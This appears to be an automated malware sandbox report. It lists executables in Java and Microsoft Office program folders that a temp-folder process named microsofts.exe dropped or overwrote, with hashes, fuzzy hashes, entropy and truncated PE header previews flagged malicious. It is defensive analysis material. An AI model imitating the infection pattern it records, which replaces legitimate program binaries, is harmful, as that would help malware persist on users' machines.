                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9B0A57581710CB52BFA6BCED9FAA2F0D11727AE34FDE2DB88935A26D1E5271A5A871C8C3D3084ECBC15291E1869BC11238BAA7405247B414896AC7B701E4868D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032934343478908
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:1Q5yXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:mosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:11D60763E2D9CB65C70D9C4136892CEE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B2D6CEAE930652746297C12650A30BB8F4C50243
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CED499BE0391048C7D487E57E1AB0F2BE3B20B70150ADF2ED57B32A3B7556CBE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:581772F0D37CF8ED124B931F56071716F3B7AD5275E746EF06910E3EAAB76C7705B47EE6816AD50868DC6457602D0D0E820BA633B4DFBC98E6B463E17726B022
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................j.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032971980019804
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:0V/qXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6E6284CBC520C2E9623AE72E7937580C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E0D11756ABEC6F84610F461DF2E738C43741FF7E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:32AB6727DB4581461ADCE1FE3A384CB606E6A0A7CBC70FEF41A8AF611B57FB81
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0B7DFB586CF6966C79DC88C870AC41DD0EE37D08F98BC0A4B1268942FE645CF9E9D7516C093C99FE0EA8FB3B39280A58A64FA30C0BD7EDEE689695C1B87F0521
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................W.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032873899540693
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:BZm6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:v3sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EEF9BCD7D0C840E251CBF916AF240D36
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F27F2D0E00D042626E9BF254E6BC57E4062A5164
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C6A02FB5FC6E99308A5FC9653B9AAB09D195CF77BE691A57204C791B90BFBEA7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:12A2F55C0B7BFEB52AAFDC9A6FCDC8B0D84D83A660F21032162ACF57FC3DEA33DA7CE19D0EBFAF7ED900600956BF3788069BC7E5AF2138F53753BA19539E92F3
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.032924671052265
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:veSbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WqsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:29957462739738A71818F933A1CFF1F3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B18A1CF5F4AC2B4B0C90CB9E9AB5418E640AEDDC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6288CF07E9B2C558A72C594049D5A66C52AC9DF29313200061749F0867B7D704
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9EC3AD62D7D7D032013EFC1CB59D9BE67999941F2C3C3F1E407F04E6C23688189439CF5A6AE548D845A5E6C97549BA83B22DFB33AF2CBE8FD5EEE8DFA4BB3EB5
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.03299173076368
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:25/jXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iLsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2A5AB3001068332970273A03B8A67ACE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:57115755C812FE4D32CB9F64D4E032806516AD8D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B55E89C32A058064466EE0B3EA3F96E653D6EBB8BDE694323DC36F49EEB59B79
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DD2C881F2883F219BAAFDB4CD20B5B9F23D91DFAEC2014DB6F86FBB7612C8E00102658D92D5F79F77961DAE9E8774552C7147EDE2364BFEAE9A358C21E2E65E0
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1202688
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.098064262875313
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:t75Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:t75sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:60C98C5C4A835402A68F231F3C7B3154
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AD533BBA7806ED1FBF6F87FF8D1BC7261800F31C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DC0F59F298779069FBFEE17E4F50E7BBC99FBDC67A9D15FD06A446A0C556F826
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D839B591B2DD7B77E283A4024A8B4AC92ACC6C6C06A59E60AC6E98E07502A0E71CA8AA3235E0F26C2FF855559ACB7134CFDCC2827730BB4BDAACD33347F84939
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................F...........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1142784
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.03232851360106
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:lKQXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:EosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2E170050D3329EE64E1EEE2BE61F6F4C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D957ED473EE9124D37C631CE31BCE0F6A34F9657
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8A317EAD876F687FC1A917747E83FD20CAE5F5C50CA8D4FE4E225507856A664D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4EDF6626B2A67D6D09B0AAD3B6A8E74A9DE37A9C362DAF412B675DECF77C1E0543ED89758C47FB762F1E2EA236F65A72E52CE571318183A0C5721A12E5E6829E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1298944
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.249110435267875
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Ai7l/3roA1sqjnhMgeiCl7G0nehbGZpbD:jl/roApDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07BD344D2FE998BD4BFAA65EBDE269D7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:73CC2C6B402C89117EE395D91B265177D193A8F9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0BD0C45246EFCACE51FE7218D182BB5841658CFA2C6EF435CD2B74D251DF962A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:732B8643820315DB34F5D0D2530D64569DDD48ECA981C19AB42873911AF8A3B02CB9D2B403C0A451D33624A8D7619B62CEE1E1CD3F1C39E51D4B4E2C8226D694
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0..........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1269248
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.286892466733821
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:g5bfQnBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gNfQnBsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:90EEE11FBB35305C1727907600BFE070
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:57938B9EEB63E5D664ED96BFCF32DEAB3D6F7339
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E3FF786F4D696AFDBCF0258F9DCBB71BD1BC06B7F2E777E7F34D90E81C402778
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4F09969201B704A6589A65C4AE29195DE3C701E4BE63863188561D96CC22527FCAA57C8B7B7126E04BD32DC4DB5D512F4AA6D57B969A27BBC1DFDBEC8E4953D8
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................................................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.303368385630805
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:fNmt0LDILi21iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:CLiNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:55EBA4BD88554CD4827DABEFB5F96792
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CF15D90F5977B6DA3FD0B5A210C23C468EE09C0E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:64A74A5375C6189D6DD6E3D83BE7CAA3CA332C833FAD49F6B3D338274FB52B30
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A52867477055AA26BD6358F5CF0E0D9930DA7168DFB9F9518FF231AA5363E2A300A33C1AEADAC8E72BDDF283C48EAFA662BDC45E3163687A3D7EB8090E2293DD
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3033742079733255
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:8Nmt0LDILi21iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:DLiNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4EBF444F9F4521A64E6FB20FA2484387
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:502A42654AF7DBDC1E9065FCCB65170BE0915E1F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:551FDD371E11D4DEAE3AAE65276A585194B6511F175666540F6FA4796ECF0E1E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B29701C7139AA0A59DF9D66A4C5EDDC614171E14288657F8C2C23588028ACED8B6AE469E93EC18C7FDB62503C0262F8D5B26C9F6C4E9544E04336625C3EF1DC
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................o........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1343488
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.236066125626409
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:NjuozQMGNUbT5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:1fNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:22ADB3760E10076EDCDA8CC14642F200
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DF89FBD90F29D7D08B08821F33365ECC96DDE0C8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F64A6ED396696E347CF8321E8E74BE490B14450196AFB68628631C5528625259
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6939B448901F95B3335056C95C219C04C77F970E80D0A2B7334C4E956899E30EC99F7497065285DED9FF0FE6B21E6EC6C1E1E1702654786FF424627ECDB37633
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.......................................... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1496064
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.577963423730056
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:RbUO42i/EssqjnhMgeiCl7G0nehbGZpbD:RJYDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:068990A72BA652AC7C082F85EC516E8D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D1BCFC0A84C91BE8CF755FBBADBB18C13F495E94
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:885CDEC8958F169145B7169664D66214543AAD7A4CF2AB32B1767C63E446F05B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0DA4085548652A52F5A54E6B7E7C2322767AFAB774D6262705DC285B46E6EE937D407F789DB10E8F0C0AFD8DDEC207BE2ABF42782A52C2CA0E699900865EC990
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... ................... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):52712960
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9618389205833076
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1572864:ZLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:ZicZmsR3Lo/cnLe
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C31D3C12312BEDB269BB030621A4D717
